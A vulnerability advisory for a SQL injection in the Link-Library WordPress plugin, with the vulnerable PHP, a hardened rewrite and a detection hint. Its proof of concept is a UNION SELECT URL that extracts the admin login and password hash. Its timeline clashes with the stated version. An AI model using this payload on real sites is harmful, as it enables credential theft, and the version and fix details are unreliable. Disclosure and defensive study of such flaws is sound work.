Link-Library 5.9.13.26 Plugin WordPress – Sql Injection

Homepage:

https://wordpress.org/plugins/link-library/

Description:

User access required: the vulnerable page is accessible only to admin users.

$_GET['linkid'] is not escaped before being concatenated into the query, which allows SQL injection.

File / Code:

Path: /wp-content/plugin/link-library/link-library-admin.php

Line: 686

if ( isset( $_GET['genthumbsingle'] ) || isset( $_GET['genfaviconsingle'] ) ) {
   $linkquery .= " AND l.link_id = " . $_GET['linkid'];
}

$linkitems = $wpdb->get_results( $linkquery );
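As an added illustration (not the plugin's own patched code), the unescaped concatenation above is shown beside a hardened form that coerces the id with absint() and binds it through $wpdb->prepare(). The function names and the fact that $linkquery already holds the base SELECT are assumptions.

```php
<?php
// Added example, not code from the Link-Library plugin. Assumes WordPress is
// loaded (global $wpdb, absint(), wp_die()) and that $linkquery already holds
// the base "SELECT ... FROM ... l WHERE ..." string built by the admin page.

// Vulnerable form, as on the advisory: the raw GET value is pasted into SQL,
// so a linkid such as "1 UNION SELECT ..." is executed as part of the query.
function ll_build_query_vulnerable( $linkquery, array $get ) {
	if ( isset( $get['genthumbsingle'] ) || isset( $get['genfaviconsingle'] ) ) {
		$linkquery .= " AND l.link_id = " . $get['linkid'];
	}
	return $linkquery;
}

// Hardened form: the id is reduced to a non-negative integer and bound as %d,
// so whatever the request carries can only ever become a number in the query.
function ll_build_query_hardened( $linkquery, array $get ) {
	global $wpdb;

	if ( isset( $get['genthumbsingle'] ) || isset( $get['genfaviconsingle'] ) ) {
		$link_id = isset( $get['linkid'] ) ? absint( $get['linkid'] ) : 0;

		if ( 0 === $link_id ) {
			// Reject a missing or non-numeric id instead of silently querying for 0.
			wp_die( esc_html__( 'Invalid link id.', 'link-library' ) );
		}

		$linkquery .= $wpdb->prepare( ' AND l.link_id = %d', $link_id );
	}
	return $linkquery;
}

// Constructed request mirroring the advisory's payload shape (hypothetical):
// absint( '1 UNION SELECT ...' ) yields 1, so the hardened query ends in
// " AND l.link_id = 1" while the vulnerable one ends in the whole payload.
$constructed_get = array(
	'genthumbsingle' => '1',
	'linkid'         => '1 UNION SELECT 1,2,3 FROM wp_users',
);
$base = 'SELECT * FROM ' . $wpdb->prefix . 'links l WHERE 1=1';
$safe = ll_build_query_hardened( $base, $constructed_get );
```

Detection hint for log review: a legitimate request to this page carries a purely numeric linkid, so any request with whitespace, quotes or SQL keywords in that parameter is worth alerting on.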

Proof of Concept

1 – Log in as an admin user.
2 – Attack URL:
 http://localhost:8080/wp-admin/admin.php?page=link-library&genthumbsingle=1&linkid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(user_login,char(58),user_pass),17,18,19,20,21,22,23,24,25,26+FROM+wp_users+WHERE+ID=1
3 – Result:


Timeline:

  • 14/08/2017 – Discovered
  • 14/08/2017 – Vendor notified
  • 14/08/2017 – Fixed in version 1.2.1
